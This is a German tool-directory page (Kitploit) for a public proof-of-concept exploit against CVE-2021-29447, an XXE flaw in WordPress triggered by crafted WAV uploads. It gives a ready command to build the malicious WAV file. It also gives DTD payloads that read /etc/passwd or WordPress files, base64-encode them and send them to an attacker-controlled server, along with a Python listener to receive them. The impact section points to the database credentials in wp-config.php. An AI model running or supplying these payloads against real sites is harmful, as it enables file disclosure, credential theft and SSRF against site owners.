Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2021-29447 — Proof-of-Concept-Exploit für CVE-2021-29447, eine WordPress-XXE-Schwachstelle, die die Offenlegung beliebiger Dateien und SSRF über manipulierte WAV-Dateien ermöglicht. | Kitploit
Tools/GitHubGitHub/assassinukg/cve-2021-29447
SchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungWebsicherheitPenetrationstests
GitHubassassinukg/cve-2021-29447

CVE-2021-29447

Proof-of-Concept-Exploit für CVE-2021-29447, eine WordPress-XXE-Schwachstelle, die die Offenlegung beliebiger Dateien und SSRF über manipulierte WAV-Dateien ermöglicht.

Repository anzeigen
1vor 5 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2021-29447

Auswirkungen

Willkürliche Dateioffenlegung: Der Inhalt jeder Datei im Dateisystem des Hosts konnte abgerufen werden, z. B. wp-config.php, das sensible Daten wie Datenbank-Anmeldedaten enthält. Server-Side Request Forgery (SSRF): HTTP-Anfragen konnten im Namen der WordPress-Installation gestellt werden. Abhängig von der Umgebung kann dies schwerwiegende Auswirkungen haben. Ausnutzung der Schwachstelle

Eine von dieser Schwachstelle betroffene WordPress-Seite wurde im Rahmen des Enumeration-Prozesses mit Hilfe des wpscan-Tools identifiziert.

image

Erstellen einer bösartigen WAV-Datei

Es ist sehr einfach, in Ihrer Bash-Konsole

nano poc.wav echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://YOURSEVERIP:PORT/NAMEEVIL.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav

Erstellen Sie auf Ihrem Angreifer-PC eine DTD mit dem Code, der auf dem Webserver ausgeführt wird.

root@kitploit:~
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=/etc/passwd">
<!ENTITY % init "<!ENTITY &#x25; trick SYSTEM 'http://YOURSERVERIP:PORT/?p=%file;'>" >

Hinweis: Verwenden Sie zum Lesen von WordPress-Dateien die Syntax "../WP-FILE.php"

root@kitploit:~
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=../index.php">
<!ENTITY % init "<!ENTITY &#x25; trick SYSTEM 'http://YOURSERVERIP:PORT/?p=%file;'>" >

Starten Sie einen Python-Server im Dateiverzeichnis (python3 -m http.server 8081)

Referenzen:

https://github.com/motikan2010/CVE-2021-29447 https://wpscan.com/vulnerability/cbbe6c17-b24e-4be4-8937-c78472a138b5

Tool herunterladen